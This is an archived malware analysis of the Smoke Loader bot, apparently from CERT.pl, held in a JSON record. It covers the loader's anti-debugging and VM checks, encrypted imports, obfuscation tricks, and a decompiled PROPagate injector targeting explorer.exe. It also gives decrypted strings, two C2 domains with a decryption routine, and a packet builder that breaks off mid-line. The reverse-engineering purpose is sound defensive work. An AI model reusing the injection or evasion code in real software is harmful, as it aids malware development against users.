{
	"id": "5e2d2d5d-0957-487e-9516-b70c0f58ce8c",
	"created_at": "2026-04-06T00:17:58.274277Z",
	"updated_at": "2026-04-10T13:11:42.535611Z",
	"deleted_at": null,
	"sha1_hash": "6d9215c5256d5e222d762c23d056c7ad6f7f89c6",
	"title": "Dissecting Smoke Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2586411,
	"plain_text": "Dissecting Smoke Loader\r\nArchived: 2026-04-05 16:38:02 UTC\r\nSmoke Loader (also known as Dofoil) is a relatively small, modular bot that is mainly used to drop various malware families.\r\nEven though it’s designed to drop other malware, it has some pretty hefty malware-like capabilities on its own.\r\nDespite being quite old, it’s still going strong, recently being dropped from RigEK and MalSpam campaigns.\r\nIn this article we’ll see how Smoke Loader unpacks itself and interacts with the C2 server.\r\nSmoke Loader first surfaced in June 2011 when it was advertised for sale on grabberz.com [1] and xaker.name [2] by a user called SmokeLdr.\r\nSmoke Loader being sold on grabberz.com\r\nWhat’s interesting is that Smoke Loader is sold only to Russian-language speakers [3].\r\nSince all functionalities are clearly described in the mentioned forum posts up to 2016, there is no point in listing them all here.\r\nThe sample we’ll be analysing is d32834d4b087ead2e7a2817db67ba8ca.\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 1 of 63\n\nDiagram presenting the unpacking timeline\r\nIf you’re only interested in the final payload you can take a quick glance at the diagram above and skip to the final layer.\r\nTable of contents\r\nLayer I\r\nLayer II\r\nDebugger checks\r\nLots of garbage code\r\nRC4-encrypted imports\r\nUnpacking\r\nLayer III\r\nJump chains\r\nDefeating\r\nAttempt I\r\nAttempt II\r\nDebugging checks\r\nVirtualization checks\r\nFunction body encryption\r\nAssembly tricks\r\nAssembly Trick I\r\nAssembly Trick II\r\nAssembly Trick III\r\nCustom imports\r\nUnpacking\r\nLayer IV (final)\r\nString encryption\r\nC2 URLs\r\nPacket structure\r\nProgram routine\r\nGeneral IOCs\r\nCollected IOCs\r\nReferences\r\nLayer I\r\nThe first thing Smoke Loader hits us with is a simple PECompact2 or UPX compression.\r\nd32834d4b087ead2e7a2817db67ba8ca: PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 
compressed\r\n8a42240be26a0f3bf16e3d8d894ca73d: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed\r\nAs with many executable compressions, both are pretty easy to decompress using publicly-accessible software:\r\nPECompact being used to decompress the first layer\r\nmichal@michal-ThinkPad-13-2nd-Gen ~/smoke_art\u003e upx -d 8a42240be26a0f3bf16e3d8d894ca73d\r\nUltimate Packer for eXecutables\r\nCopyright (C) 1996 - 2013\r\nUPX 3.91 Markus Oberhumer, Laszlo Molnar \u0026 John Reiser Sep 30th 2013\r\nFile size Ratio Format Name\r\n-------------------- ------ ----------- -----------\r\n455168 \u003c- 230400 50.62% win32/pe 8a42240be26a0f3bf16e3d8d894ca73d\r\nUnpacked 1 file.\r\nDecompressing UPX-packed sample\r\nThat wasn’t hard, let’s move on.\r\nLayer II\r\nEntry function, which handles the debugging check and performs some useless API calls as a disguise\r\nDebugger checks\r\nThe PEB structure is checked for the usual debugger traces: the BeingDebugged flag, the heap-debugging bits of NtGlobalFlag (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS, 0x70 in total, which the loader sets when a process is created under a debugger) and a field in the header of the default process heap:\r\nint amIBeingDebugged()\r\n{\r\n    struct _PEB *v0; // esi\r\n    unsigned __int8 v2; // [esp+Fh] [ebp-1h]\r\n    v2 = 0;\r\n    v0 = NtCurrentPeb();\r\n    if ( v0-\u003eBeingDebugged              // PEB.BeingDebugged\r\n      || v0-\u003eNtGlobalFlag \u0026 0x70       // heap tail/free/validate flags\r\n      || *(v0-\u003eProcessHeap + 4) )     // default process heap header field\r\n        v2 = 1;\r\n    return v2;\r\n}\r\nLots of garbage code\r\nAlmost every function is injected with pointless instructions in order to make the disassembly more complicated than it really is.\r\nA part of RC4 function, which contains a lot of useless code\r\nRC4-encrypted imports\r\nIn this stage, almost all imports and library names are encrypted with RC4 before being passed to LoadLibraryA and then to GetProcAddress.\r\nThe encrypted imports are first placed on the 
stack:\r\n*rc4_key = 0xF3F3C80F;          // RC4 key used to decrypt all imports: 27 bytes, six dwords plus the low 3 bytes of the seventh\r\n*\u0026rc4_key[4] = 0xD8F6A03C;\r\n*\u0026rc4_key[8] = 0x8DC6BE0F;\r\n*\u0026rc4_key[12] = 0x527B1805;\r\n*\u0026rc4_key[16] = 0xE0BA0FCD;\r\n*\u0026rc4_key[20] = 0xC6BE0F70;\r\n*\u0026rc4_key[24] = 0xD8A30F;\r\n*v727 = 0xD2BF3A5F;             // encrypted \"NtUnmapViewOfSection\" (20 bytes)\r\n*\u0026v727[4] = 0x42DCD3A3;\r\n*\u0026v727[8] = 0x7D50FDF6;\r\n*\u0026v727[12] = 0xA4E8715D;\r\n*\u0026v727[16] = 0x30968317;\r\nv727[20] = 0;\r\n...\r\nThen they are decrypted in place using RC4 with the hardcoded key (the third argument is never used):\r\nrc4(0x1Bu, rc4_key, 9u, v727, 0x14u); // rc4(key_length, key, unused_var, data, data_length)\r\nFinally, the library name is passed to LoadLibraryA and the function name to GetProcAddress:\r\nv670 = LoadLibraryA(v995);\r\nNtUnmapViewOfSection = GetProcAddress(v670, v727);\r\nA custom import table is populated this way and used further in execution. Since the key and every ciphertext sit in plain dword stores, the whole table can be recovered statically by running RC4 over each (key, buffer, length) triple.\r\nUnpacking\r\nFinally, a new process is created and two calls to WriteProcessMemory are performed:\r\n{\r\n\"category\": \"process\",\r\n\"parentcaller\": \"0x0040f773\",\r\n\"return\": \"0x00000001\",\r\n\"timestamp\": \"2018-05-23 15:25:02,142\",\r\n\"caller\": \"0x0041ad77\",\r\n\"thread_id\": \"3848\",\r\n\"repeated\": 0,\r\n\"api\": \"WriteProcessMemory\",\r\n\"status\": true,\r\n\"arguments\": [\r\n{\r\n\"name\": \"Buffer\",\r\n\"value\": \"MZ\\\\x80\\\\x00...\"\r\n},\r\n{\r\n\"name\": \"StackPivoted\",\r\n\"value\": \"no\"\r\n},\r\n{\r\n\"name\": \"ProcessHandle\",\r\n\"value\": \"0x000000b0\"\r\n},\r\n{\r\n\"name\": \"BufferLength\",\r\n\"value\": \"0x00000200\"\r\n},\r\n{\r\n\"name\": \"BaseAddress\",\r\n\"value\": \"0x00400000\"\r\n}\r\n],\r\n\"id\": 180\r\n}\r\n{\r\n\"category\": \"process\",\r\n\"parentcaller\": \"0x0040f773\",\r\n\"return\": \"0x00000001\",\r\n\"timestamp\": \"2018-05-23 
15:25:02,282\",\r\n\"caller\": \"0x0041adc5\",\r\n\"thread_id\": \"3848\",\r\n\"repeated\": 0,\r\n\"api\": \"WriteProcessMemory\",\r\n\"status\": true,\r\n\"arguments\": [\r\n{\r\n\"name\": \"Buffer\",\r\n\"value\": \"+\\\\x02\\\\xc4 \\\\x90\\\\xa4\u0026l...\"\r\n},\r\n{\r\n\"name\": \"StackPivoted\",\r\n\"value\": \"no\"\r\n},\r\n{\r\n\"name\": \"ProcessHandle\",\r\n\"value\": \"0x000000b0\"\r\n},\r\n{\r\n\"name\": \"BufferLength\",\r\n\"value\": \"0x00008000\"\r\n},\r\n{\r\n\"name\": \"BaseAddress\",\r\n\"value\": \"0x00401000\"\r\n}\r\n],\r\n\"id\": 181\r\n}\r\nThe writes are pretty characteristic and can be easily noticed in the Cuckoo report.\r\nThe first writes the 0x200-byte MZ/PE header to 0x00400000 and the second the remaining 0x8000 bytes to 0x00401000, i.e. the image is written at its mapped addresses. If we concatenate these two writes we get the next layer.\r\nLayer III\r\nWe’re welcomed with:\r\nThe exported start address\r\nWell, that’s not good.\r\nWhat we see is the result of several obfuscation methods and tricks. We’ll look at each one and try to understand how it works.\r\nJump chains\r\nAlmost all early-executed functions use a chained-jump obfuscation technique.\r\nInstead of placing the instructions in a normal, linear manner, the instructions are scattered within the function, with jump instructions connecting each one to the next.\r\nThe control flow is all over the place\r\nIf we were to write a script to follow the program’s flow and graph the instructions we’d probably get something like this:\r\nPartially deobfuscated start function\r\nOne can almost immediately see that a vast majority of instructions are used only to divert the 
natural program flow.\r\nDefeating\r\nAttempt I\r\nWe tried creating an idaapi script that looks through all instruction blocks within a function and tries to concatenate blocks that are connected with each other via a 1:1 jump (a jump from one possible address to one possible location).\r\nThe author had probably thought about that and implemented jmp instructions using consecutive jnz and jz instructions to the same target. This doesn’t complicate our solution too much though.\r\nimport idaapi\r\nimport idautils\r\nimport idc\r\nimport ida_ua\r\n\r\nvisited = []\r\n\r\n\r\ndef iterate_over_blocks(ea):\r\n    # Follow the chain starting at ea and build a tree of blocks. A block ends at the\r\n    # first jmp, at a jz/jnz pair (which together form an unconditional jmp) or at retn.\r\n    if ea in visited:\r\n        return None\r\n    last_jump = None\r\n    this_node = {\r\n        'addr': ea,\r\n        'code': '',\r\n        'instructions': [],\r\n        'children': []\r\n    }\r\n    visited.append(ea)\r\n    for head in idautils.Heads(ea, ea + 30):\r\n        i = idaapi.DecodeInstruction(head)\r\n        if i is None:\r\n            continue\r\n        mnem = i.get_canon_mnem()\r\n        # [:-1] strips the trailing 'L' that Python 2 prints for long integers\r\n        this_node['code'] += '%s: %s\\n' % (hex(head)[:-1], idc.GetDisasm(head))\r\n        print(idc.GetDisasm(head))\r\n        if mnem == 'jmp' and i.Op1.type != ida_ua.o_reg:\r\n            jump_addr = i.ops[0].addr\r\n            # a pending conditional jump to a different target is a real branch: keep both paths\r\n            if last_jump is not None and last_jump != jump_addr:\r\n                child = iterate_over_blocks(last_jump)\r\n                if child is not None:\r\n                    this_node['children'].append(child)\r\n            child = iterate_over_blocks(jump_addr)\r\n            if child is not None:\r\n                this_node['children'].append(child)\r\n            return this_node\r\n        elif mnem[0] == 'j' and i.Op1.type != ida_ua.o_reg:\r\n            jump_addr = i.ops[0].addr\r\n            if last_jump is None:\r\n                last_jump = jump_addr      # first half of a jz/jnz pair\r\n                print('Setting')\r\n            else:\r\n                # second half: both halves target the same address, so this is an unconditional jmp\r\n                assert last_jump == jump_addr\r\n                child = iterate_over_blocks(jump_addr)\r\n                if child is not None:\r\n                    this_node['children'].append(child)\r\n                return this_node\r\n        elif last_jump is not None:\r\n            # a lone conditional jump followed by ordinary code: keep the taken path as a child\r\n            child = iterate_over_blocks(last_jump)\r\n            if child is not None:\r\n                this_node['children'].append(child)\r\n            last_jump = None\r\n            this_node['instructions'].append(i)\r\n        elif mnem in ['retn', 'jmp']:\r\n            this_node['instructions'].append(i)\r\n            return this_node\r\n        else:\r\n            this_node['instructions'].append(i)\r\n    return this_node\r\n\r\n\r\nstart_ea = idc.ScreenEA()\r\nbuf = iterate_over_blocks(start_ea)\r\nA very naive Python script implementing the mentioned approach\r\nIf we run it on the start function and strip the jumps we get:\r\ncall $+5\r\npop ebx\r\nsub ebx, 2997h\r\npush 30h\r\npop eax\r\nmov eax, fs:[eax]\r\ncmp dword ptr [eax+0A4h], 6\r\njl short locret_402A2F\r\nmov esi, eax\r\nmovzx eax, byte ptr [eax+2]\r\ninc eax\r\nmov ecx, 294Dh\r\nmul ecx\r\nadd eax, ebx\r\npush eax\r\nretn\r\nA lot better! But we can actually do even better by letting IDA do most of the work for us.\r\nAttempt II\r\nThe only thing we need to do in order to make IDA recognize these blocks as a valid function is to make sure that all of the jumps are marked as a definitive change of flow control.\r\nWhile jmp instructions are marked as such by default, the jz/jnz pairs need to be patched to jmp instructions (a jz/jnz pair to the same address is an unconditional jump, so patching the first of the pair to jmp changes nothing about the behaviour):\r\nNotice the newly-created dotted line that denotes an end of function code\r\nThis trick allows IDA to recognize function bodies and even attempt to decompile them:\r\nstruct _PEB *start()\r\n{\r\n    struct _PEB *result; // eax\r\n    result = NtCurrentPeb();\r\n    if ( (signed int)result-\u003eOSMajorVersion \u003e= 6 )   // Vista or newer; on older systems it simply returns\r\n        result = (struct _PEB *)(0x294D * (result-\u003eBeingDebugged + 1) + 0x400000);\r\n    return result;\r\n}\r\nDecompiled start function after patching all jz/jnz instructions\r\nWhile (as almost always) the decompilation isn’t 100% correct, it gives us a good basic idea of what the function does.\r\nThis function, for example, loads the PEB structure and then accesses the OSMajorVersion and BeingDebugged fields; the value it computes is the address execution continues at (the push eax / retn pair in the listing above is the jump).\r\nDebugging checks\r\nIn this layer, we’ve noticed 2 debugging checks, conveniently located right at the beginning of execution.\r\nWhile they are the same as in the 
previous stage, the approach differs slightly.\r\nWhat is interesting is that the values read by the debugging checks are used in calculating the next function’s address:\r\nmov eax, fs:[eax]                 // eax = 0x30, so this loads the PEB\r\nmov esi, eax\r\nmovzx eax, byte ptr [eax+2]       // PEB.BeingDebugged\r\ninc eax\r\nmov ecx, 294Dh\r\nmul ecx                           // eax = (BeingDebugged + 1) * 0x294D\r\nadd eax, ebx                      // ebx holds the image base\r\npush eax\r\nretn\r\nReading the BeingDebugged field from PEB\r\nmovzx eax, byte ptr [esi+68h]     // PEB.NtGlobalFlag\r\ninc eax\r\npush 28EAh\r\npop ecx\r\nmul ecx                           // eax = (NtGlobalFlag + 1) * 0x28EA\r\nadd eax, ebx\r\njmp eax\r\nReading the NtGlobalFlag field from PEB\r\nThe code calculates the next jump address from the values of the BeingDebugged and NtGlobalFlag fields: with both equal to 0 the targets are image base + 0x294D and image base + 0x28EA, but if either one is non-zero the multiplier sends execution somewhere else entirely (2 × 0x294D, or 0x71 × 0x28EA for the usual debugger value 0x70), into bytes that were never meant to be executed. Harsh.\r\nNormally patching the binary or changing the values mid-debugging works though; both fields live in the PEB (fs:[0x30]) at offsets 2 and 0x68, as the listings show.\r\nVirtualization checks\r\nThe binary tries to get the module handle of “sbiedll” (the library Sandboxie injects into every sandboxed process) using GetModuleHandleA; if it succeeds, and thus the process is running under Sandboxie, the program exits.\r\nThe registry value System\\CurrentControlSet\\Services\\Disk\\Enum\\0 is read and if any of the following strings is found within it, the program exits:\r\nqemu\r\nvirtio\r\nvmware\r\nvbox\r\nxen\r\nFunction body encryption\r\nA vast majority of functions are encrypted:\r\npush ebp\r\nmov ebp, esp\r\nsub esp, 0C8h\r\nmov eax, 23A5h\r\nmov ecx, 87h\r\ncall dexor_buffer                 // the function decryption routine (RVA in eax, byte count in ecx)\r\ninc esp                           // from here on the bytes are still encrypted\r\nlodsb\r\nlodsb\r\nlodsb\r\nlodsb\r\nimul dword ptr ds:0AC8F0647h\r\nlodsb\r\nand eax, 0A0EC275Ch\r\ndaa\r\nin al, dx\r\nmov al, 27h\r\nin al, dx\r\nmovsb\r\nsub [ebx+28h], ebp\r\nA function that is partially encrypted\r\nAfter deobfuscation the encryption function turns out to be pretty simple:\r\nchar __usercall 
dexor_buffer@\u003cal\u003e(int a1@\u003ceax\u003e, int a2@\u003cecx\u003e)\r\n{\r\n    char *v2; // esi\r\n    _BYTE *v3; // edi\r\n    char v4; // al\r\n    char result; // al\r\n    v2 = (char *)(a1 + 0x400000);   // a1 is an RVA; the image base is added here\r\n    v3 = (_BYTE *)(a1 + 0x400000);\r\n    do\r\n    {\r\n        v4 = *v2++;\r\n        result = v4 ^ 0xAC;         // single hardcoded key byte\r\n        *v3++ = result;\r\n        --a2;\r\n    }\r\n    while ( a2 );\r\n    return result;\r\n}\r\nDecompiled code decryption method\r\nIt accepts an RVA and a number of bytes in the eax and ecx registers respectively and xors all bytes in that range with a hardcoded byte. Because it is a plain xor, the same call both decrypts and re-encrypts a region.\r\nWhat’s also interesting is that the binary tries to keep as little code decrypted at a time as possible:\r\nmov ecx, 87h\r\nmov eax, 23A5h\r\ncall dexor_buffer // decrypt a new code section\r\n...\r\n\u003c\u003c part of function body \u003e\u003e\r\n...\r\nmov eax, 23A5h\r\nmov ecx, 87h\r\ncall dexor_buffer // encrypt the old code section back\r\nmov eax, 2459h\r\nmov ecx, 0A2h\r\ncall dexor_buffer // decrypt the next code section\r\n...\r\n\u003c\u003c further part of function body \u003e\u003e\r\nExample of keeping the code encrypted\r\nWe’re able to decrypt the chunks using an idaapi patching script (run it once per region: a second run on the same range encrypts it again):\r\nimport idaapi\r\n\r\ndef dexor_region(ea, amount):\r\n    # ea is the RVA passed in eax, amount the byte count passed in ecx\r\n    ea = 0x00400000 + ea\r\n    for i in range(amount):\r\n        b = idaapi.get_byte(ea + i)\r\n        b ^= 0xac\r\n        idaapi.patch_byte(ea + i, b)\r\nSimple idaapi script that xors a given region with a byte\r\nAssembly tricks\r\nThis layer employs a few neat position-independent-code assembly tricks.\r\nAssembly Trick I\r\ncall loc_4024A7 pushes the address of the data that follows it (in this case the string “kernel32”) onto the stack and jumps over that data to the code\r\npop esi puts the string’s address into the esi register\r\ncmp byte ptr [esi], 0 the pointer can now be used like a normal rdata string\r\nAssembly Trick 
II\r\nInstead of executing jmp eax, eax is first pushed onto the stack and then retn is executed, so the indirect branch does not show up as a jump in the disassembly.\r\nAssembly Trick III\r\ncall $+5 jumps to the next instruction (the call instruction itself is 5 bytes long), but because it’s a call it also pushes the return address, i.e. the address of that next instruction, onto the stack.\r\nIn this case this is used to calculate the program’s base address (0x004023AA – 0x23AA = 0x00400000); the start function uses the same trick with call $+5 / pop ebx / sub ebx, 2997h.\r\nCustom imports\r\nThis stage builds a custom import table using a djb2 hash lookup.\r\nIt first iterates over 4 hardcoded library names, loads each one using LdrLoadDll and stores the handle.\r\nNext, it iterates over 4 corresponding arrays of import hashes and looks for matching values among the hashed export names of each library.\r\nWhen a match is found, it grabs the function’s address from the library’s export thunk and stores it in an API table kept on the stack (the api_table passed to inject_code below).\r\nHashes of functions to be imported\r\nConstructed api function table\r\nUnpacking\r\nFinally, the program uses RtlDecompressBuffer with COMPRESSION_FORMAT_LZNT1 to decompress the buffer and executes the final payload using PROPagate injection [4]. The decompiled injector below maps the payload into the shell (explorer.exe) process through a shared section, copies the PE sections into it, applies base relocations and then hands the remote entry point to the PROPagate routine:\r\nint __stdcall inject_code(api_table *a1, _DWORD *buffer, int real_size)\r\n{\r\nint v3; // eax\r\nunsigned __int8 *v4; // esi\r\nsigned int v5; // ecx\r\nint v6; // edx\r\nint v7; // eax\r\nvoid *v8; // esp\r\nchar *v9; // esi\r\nint v10; // ecx\r\n_DWORD *v11; // edx\r\nunsigned int v12; // ecx\r\nint v13; // edx\r\nint *v14; // esi\r\nint v15; // edi\r\nunsigned int v16; // ecx\r\n__int16 v17; // ax\r\nint v19; // [esp-4h] [ebp-60h]\r\nchar *v20; // [esp-4h] [ebp-60h]\r\nint v21; // [esp+Ch] [ebp-50h]\r\nint a3a; // [esp+10h] [ebp-4Ch]\r\nint a2a; // [esp+14h] [ebp-48h]\r\nint v24; // [esp+1Ch] [ebp-40h]\r\nint v25; // [esp+20h] [ebp-3Ch]\r\nint v26; // [esp+24h] [ebp-38h]\r\nint v27; // [esp+28h] [ebp-34h]\r\nint a4; // [esp+2Ch] [ebp-30h]\r\nint v29; // [esp+30h] [ebp-2Ch]\r\nint v30; // [esp+34h] [ebp-28h]\r\nint v31; // [esp+38h] [ebp-24h]\r\nchar v32; // [esp+3Ch] [ebp-20h]\r\nint v33; // [esp+54h] [ebp-8h]\r\nint v34; // [esp+58h] [ebp-4h]\r\n(dexor_buffer)(657);                        // decrypt own body; every return path re-encrypts it\r\nv29 = 0;\r\nv3 = (*a1-\u003eGetShellWindow)();              // the shell window is owned by explorer.exe\r\nif ( !v3 )\r\nreturn (dexor_buffer)(657);\r\na3a = v3;\r\nv21 = 0;\r\n(*a1-\u003eGetWindowThreadProcessId)(v3, \u0026v21); // explorer.exe PID\r\nif ( !v21 )\r\nreturn (dexor_buffer)(657);\r\nv30 = v21;\r\nv31 = 0;\r\n(*a1-\u003eRtlZeroMemory)(\u0026v32, 24);\r\n*\u0026v32 = 24;\r\nif ( (*a1-\u003eNtOpenProcess)(\u0026a2a, 0x28, \u0026v32, \u0026v30) ) // PROCESS_VM_OPERATION | PROCESS_VM_WRITE\r\nreturn (dexor_buffer)(657);\r\nv34 = 0;\r\nv33 = real_size + 0x10000;\r\nif ( (*a1-\u003eNtCreateSection)(\r\n\u0026v24,\r\n0xF001F, // SECTION_ALL_ACCESS\r\n0,\r\n\u0026v33,\r\n64, // PAGE_EXECUTE_READWRITE\r\n0x8000000, // SEC_COMMIT\r\n0) )\r\n{\r\nreturn (dexor_buffer)(657);\r\n}\r\nv26 = 0;\r\nv25 = v33;\r\nif ( (*a1-\u003eNtMapViewOfSection)(v24, a2a, \u0026v26, 0, 0, 0, \u0026v25, 1, 0, 64) ) // view inside explorer.exe at v26\r\nreturn (dexor_buffer)(657);\r\nv27 = 0;\r\nif ( (*a1-\u003eNtMapViewOfSection)(v24, -1, \u0026v27, 0, 0, 0, \u0026v25, 1, 0, 64) ) // same section in our own process at v27\r\nreturn (dexor_buffer)(657);\r\nif ( __GS__ )                               // non-zero GS selector: 64-bit environment, payload is PE32+\r\n++v29;\r\nv4 = \u0026dword_405689;\r\nv5 = 0x38E4;\r\nv6 = 0x2260;\r\ndo                                          // multiply-by-33 hash (the djb2 recurrence) over 0x38E4 bytes of code\r\n{\r\nv7 = *v4++;\r\nv6 = v7 + 33 * v6;\r\n--v5;\r\n}\r\nwhile ( v5 );\r\nv8 = alloca(v6 ^ 0x9F63E0F6);              // the hash only selects a stack adjustment; any change to those bytes changes it\r\nv9 = buffer + *buffer;                      // e_lfanew: PE header of the decompressed payload\r\nv10 = *(v9 + 3);                            // NumberOfSections\r\nif ( v29 )\r\nv11 = v9 + 264;                             // first IMAGE_SECTION_HEADER (PE32+)\r\nelse\r\nv11 = v9 + 248;                             // first IMAGE_SECTION_HEADER (PE32)\r\ndo                                          // copy every section into the local view\r\n{\r\nv19 = v10;\r\nv12 = v11[4];                               // SizeOfRawData\r\nif ( v12 )\r\nqmemcpy((v27 + v11[3]), buffer + v11[5], v12); // VirtualAddress \u003c- PointerToRawData\r\nv11 += 10;                                  // sizeof(IMAGE_SECTION_HEADER) == 40\r\nv10 = v19 - 1;\r\n}\r\nwhile ( v19 != 1 );\r\nif ( v29 )\r\n{\r\ndexor_dwords(\u0026loc_402695, 0x218u);        // 64-bit path: decrypt and run a separate stub\r\n(loc_402B8D)(v9, v27);\r\n}\r\nelse\r\n{\r\nv20 = v9;\r\nv13 = *(v9 + 13) - v26;                     // ImageBase minus the address of the view in explorer.exe\r\nv14 = (v27 + *(v9 + 40));                   // IMAGE_DIRECTORY_ENTRY_BASERELOC\r\nwhile ( *v14 )                              // walk the relocation blocks\r\n{\r\nv15 = *v14;\r\nv16 = (v14[1] - 8) \u003e\u003e 1;\r\nv14 += 2;\r\ndo\r\n{\r\nv17 = *v14;\r\nv14 = (v14 + 2);\r\nif ( v17 \u0026 0x3000 )                         // type nibble; 0x3000 == IMAGE_REL_BASED_HIGHLOW\r\n*(v15 + v27 + (v17 \u0026 0xFFF)) -= v13;\r\n--v16;\r\n}\r\nwhile ( v16 );\r\n}\r\nv9 = v20;\r\n}\r\na4 = v26 + *(v9 + 10);                      // AddressOfEntryPoint, as seen from explorer.exe\r\n(*a1-\u003eNtUnmapViewOfSection)(-1, v27);      // drop the local view; the remote one stays mapped\r\nsub_401554(a1, a2a, a3a, a4);               // PROPagate: trigger execution at a4 through the shell window\r\n(*a1-\u003eNtClose)(v24);\r\n(*a1-\u003eNtClose)(a2a);\r\nreturn (dexor_buffer)(657);\r\n}\r\nLayer IV (final)\r\nString encryption\r\nAll strings are encrypted using RC4 with a hardcoded 4-byte key and stored in one blob of length-prefixed entries:\r\nchar *__thiscall get_decrypted_string(int index)\r\n{\r\nchar *v1; // esi\r\nchar *v2; // ebx\r\nint v3; // eax\r\nint v4; // edx\r\nunsigned int length; // edi\r\nchar rc4_key[4]; // [esp+Ch] [ebp-4h]\r\nv1 = 0;\r\n*(_DWORD *)rc4_key = 0x32D8D3FE;          // 4-byte RC4 key\r\nv2 = \u0026encrypted_strings;\r\nv3 = 0;\r\nv4 = 0;\r\nwhile ( 1 )                               // walk the blob: [len][len bytes][len][len bytes]...\r\n{\r\nlength = (unsigned __int8)*v2;\r\nif ( *v2 )\r\n++v3;                                     // only non-empty entries count towards the index\r\nif ( v3 == index )\r\nbreak;\r\nv2 += length + 1;\r\nif ( (unsigned int)++v4 \u003e= 735 )\r\nreturn v1;                                // index out of range: NULL\r\n}\r\nv1 = (char *)allocWrapper((void *)(length + 2));\r\nMEMORY[0x77655800](v1, v2 + 1, length);   // copy through an absolute address resolved at runtime\r\nrc4(v1, rc4_key, length, 4u);             // rc4(data, key, data_length, key_length)\r\nreturn v1;\r\n}\r\nFunction used to get a decrypted string from a specific index in the encrypted blob\r\nStructure of encrypted strings blob\r\nIn this sample, the buffer decrypts to:\r\n(index, string)\r\n(1, 'http://www.msftncsi.com/ncsi.txt')\r\n(2, 'Software\\\\Microsoft\\\\Internet Explorer')\r\n(3, 'advapi32.dll')\r\n(4, 'Location:')\r\n(5, 'plugin_size')\r\n(6, '\\\\explorer.exe')\r\n(7, 'user32')\r\n(8, 
'shell32')\r\n(9, 'advapi32')\r\n(10, 'urlmon')\r\n(11, 'ole32')\r\n(12, 'winhttp')\r\n(13, 'ws2_32')\r\n(14, 'dnsapi')\r\n(15, 'svcVersion')\r\n(16, 'Version')\r\n(17, 'S:(ML;;NW;;;LW)D:(A;;0x120083;;;WD)(A;;0x120083;;;AC)')\r\n(18, '%s\\\\%hs')\r\n(19, '%s%s')\r\n(20, 'regsvr32 /s %s')\r\n(21, '%s\\\\%hs.lnk')\r\n(22, '%APPDATA%\\\\Microsoft\\\\Windows')\r\n(23, '%TEMP%')\r\n(24, '%ComSpec%')\r\n(25, '.exe')\r\n(26, '.dll')\r\n(27, '/c start \"\" \"%s\"')\r\n(28, ':Zone.Identifier')\r\n(29, 'POST')\r\n(30, 'Content-Type: application/x-www-form-urlencoded')\r\n(31, 'runas')\r\n(32, 'Host: %s')\r\n(33, 'PT10M')\r\n(34, '1999-11-30T00:00:00')\r\n(35, 'Opera scheduled Autoupdate %u')\r\nDecrypted strings\r\nC2 URLs\r\nC2 URLs are stored encrypted in the data section:\r\nPart of data section that contains the encrypted URLs\r\nThe encrypted URL structure can be represented as:\r\nEncrypted C2 URL structure\r\nAs the decompilation shows, each entry is a length byte, that many encrypted bytes, and the 4-byte key stored right after them. The encryption method is a simple xor routine with the byte key being derived from the dword key:\r\nchar *__thiscall decrypt_thing(char *this)\r\n{\r\nchar *v1; // ebp\r\nchar v2; // bl\r\nint v3; // esi\r\nchar *v4; // edi\r\nint v5; // eax\r\nint v6; // ebp\r\nchar *v7; // edx\r\nint v8; // edi\r\nchar v9; // al\r\nsigned __int32 v10; // ecx\r\nsigned int v11; // ebx\r\nchar *v13; // [esp+14h] [ebp-4h]\r\nv1 = this;\r\nv2 = *this;\r\nv3 = (unsigned __int8)*this;              // length byte\r\nv4 = (char *)allocWrapper((void *)(v3 + 1));\r\nv5 = (int)(v1 + 1);                       // encrypted bytes start right after the length\r\nv13 = v4;\r\nif ( !v2 )\r\nreturn v4;\r\nv6 = (int)\u0026v1[v3];                        // v6 + 1 is the dword key that follows the ciphertext\r\nv7 = v4;\r\nv8 = v5 - (_DWORD)v4;\r\ndo\r\n{\r\nv9 = v7[v8];\r\nv10 = _byteswap_ulong(*(_DWORD *)(v6 + 1));\r\nv11 = 4;\r\ndo                                        // xor in all four key bytes; their order is irrelevant\r\n{\r\nv9 ^= v10;\r\nv10 \u003e\u003e= 8;\r\n--v11;\r\n}\r\nwhile ( v11 );\r\n*v7++ = ~v9;                              // the final inversion is a xor with 0xFF\r\n--v3;\r\n}\r\nwhile ( v3 );\r\nv4 = v13;\r\nreturn v4;\r\n}\r\nDecompiled function used to decrypt C2 URLs\r\nWhich can be rewritten in Python as:\r\nimport struct\r\nimport binascii\r\nfrom functools import reduce\r\n\r\ndef smoke_unxor(enc_buf, dword):\r\n    # the four key bytes and the final ~ (xor 0xff) collapse into a single byte key r\r\n    key_dword = struct.pack(\"\u003cI\", dword)\r\n    r = reduce(lambda x, y: x ^ y, bytearray(key_dword), 0xff)\r\n    return ''.join(chr(b ^ r) for b in bytearray(enc_buf))\r\n\u003e\u003e\u003e smoke_unxor(binascii.unhexlify('372B2B2F2C6570703A272F3A2D2B2B3030332C71323370'), 0x7D680BBE)\r\n'https://experttools.ml/'\r\n\u003e\u003e\u003e smoke_unxor(binascii.unhexlify('B1ADADA9AAE3F6F6BCA1A9BCABADADB6B6B5AAF7AAADABBCB8B4F6'), 0x75A407F0)\r\n'https://experttools.stream/'\r\nOutput example\r\nPacket structure\r\nint __fastcall send_command(char *url, __int16 cmd, int some_flag, int some_flag_1, int additional_data, _DWORD *a6)\r\n{\r\nchar *c2_url; // ebp\r\nint v7; // esi\r\nint v8; // eax\r\nchar *packet; // edi\r\nint v10; // esi\r\n__int16 command_id; // [esp+1Ah] [ebp-6h]\r\nint packet_length; // [esp+1Ch] [ebp-4h]\r\ncommand_id = cmd;\r\nc2_url = url;\r\nv7 = 63; // header size: 62 bytes plus the terminating NUL\r\npacket_length = 63;\r\nif ( additional_data )\r\n{\r\nv8 = lstrlenA(additional_data);\r\nv7 = v8 + 63;\r\npacket_length = v8 + 63;\r\n}\r\npacket = (char *)allocWrapper((void *)(v7 + 1));   // fresh buffer; lstrcatA relies on it being zeroed\r\n*(_WORD *)packet = 2018;                           // offset 0: magic\r\nlstrcatA(packet + 2, bot_id);                      // offset 2\r\nlstrcatA(packet + 43, \u0026sample_id);                 // offset 43\r\npacket[49] = 'a';                                  // offset 49: hardcoded\r\npacket[50] = dword_2FE53CF;                        // offsets 50 and 51: two flag bytes\r\npacket[51] = dword_2FE53D3;\r\n*((_WORD *)packet + 26) 